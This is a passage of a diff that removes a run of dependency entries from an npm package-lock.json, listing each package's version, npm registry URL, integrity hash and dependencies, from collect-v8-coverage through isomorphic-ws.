"sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ecc-jsbn/node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "engines": { - "node": "*" - } - }, - "node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs-minipass/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs-minipass/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/ip-address": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-8.1.0.tgz", - "integrity": "sha512-Wz91gZKpNKoXtqvY8ScarKYwhXoK4r/b5QuT+uywe/azv0/nUCo7Bh0IRRI7F9DHR06kJNWtzMGLIbXavngbKA==", - "dependencies": { - "jsbn": "1.1.0", - "sprintf-js": "1.1.2" - }, - "engines": { - "node": ">= 12" - } - }, - "node_modules/ip-regex": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-4.3.0.tgz", - "integrity": "sha512-B9ZWJxHHOHUhUjCPrMpLD4xEq35bUTClHM1S6CBU5ixQnkZmwipwgc96vAd7AAGM9TGHvJR+Uss+/Ak6UphK+Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-ip": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-3.1.0.tgz", - "integrity": "sha512-35vd5necO7IitFPjd/YBeqwWnyDWbuLH9ZXQdMfDA8TEo7pv5X8yfrvVO3xbJbLUlERCMvf6X0hTUamQxCYJ9Q==", - "dependencies": { - "ip-regex": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - 